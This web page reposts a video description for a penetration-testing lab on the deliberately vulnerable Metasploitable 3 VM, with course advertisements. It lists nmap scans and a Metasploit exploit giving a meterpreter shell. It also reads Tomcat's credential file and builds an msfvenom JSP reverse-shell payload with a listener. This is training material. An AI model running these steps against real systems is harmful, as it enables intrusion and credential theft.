Videos

Published on January 9th, 2019 📆 | 3000 Views ⚑

0

Metasploitable 3 Lab: Setup, Enumeration, and Exploitation


iSpeech.org



Please check out my Udemy courses! Coupon code applied to the following links....

https://www.udemy.com/hands-on-penetration-testing-labs-30/?couponCode=NINE99

https://www.udemy.com/hands-on-penetration-testing-labs-20/?couponCode=NINE99

https://www.udemy.com/kali-linux-web-app-pentesting-labs/?couponCode=NINE99

https://www.udemy.com/kali-linux-hands-on-penetration-testing-labs/?couponCode=NINE99

https://www.udemy.com/network-security-analysis-using-wireshark-snort-and-so/?couponCode=NINE99

https://www.udemy.com/snort-intrusion-detection-rule-writing-and-pcap-analysis/?couponCode=NINE99

Description:

This video from my Udemy course "Hands-on Penetration Testing Labs 2.0" will show you how setup, enumerate, and exploit one of the only available intentionally vulnerable Windows Server 2008 VMs, Metasploitable 3. This method is current as of January 2019.

All you will need is VirtualBox and Vagrant, which are easy to obtain. Check below for relevant commands and URLs.





Commands:

vagrant init
vagrant up

nmap -Pn -sn 192.168.56.0/24

nmap -A 192.168.56.107

msfconsole
use exploit /windows/http/manageengine_connectionid_write
set RHOST 192.168.56.103. *Remember there's two IP's configured. if one IP doesn’t work, try the other one*
set RPORT 8383
set SSL true
set LHOST 192.168.90.5
Now we have a meterpterer shell! Let's grab a cmd.exe shell.
execute -f cmd.exe -i -H
hostname / whoami

cd C:
cd Program Files
cd Apache Software Foundation
cd tomcat
cd apache-tomcat-8.0.33
cd conf
type tomcat-users.xml

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.102 LPORT=4445 -f war *greater than symbol* malicious.war

msfconsole
use exploit/multi/handler
set LHOST 192.168.56.102
set LPORT 4445
set PAYLOAD java/jsp_shell_reverse_tcp
run

URLs:
https://virtualbox.org
https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile
https://www.vagrantup.com/downloads.html
https://www.rapid7.com/db/modules/exploit/windows/http/desktopcentral_statusupdate_upload

source

Tagged with:



0 Responses to Metasploitable 3 Lab: Setup, Enumeration, and Exploitation






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑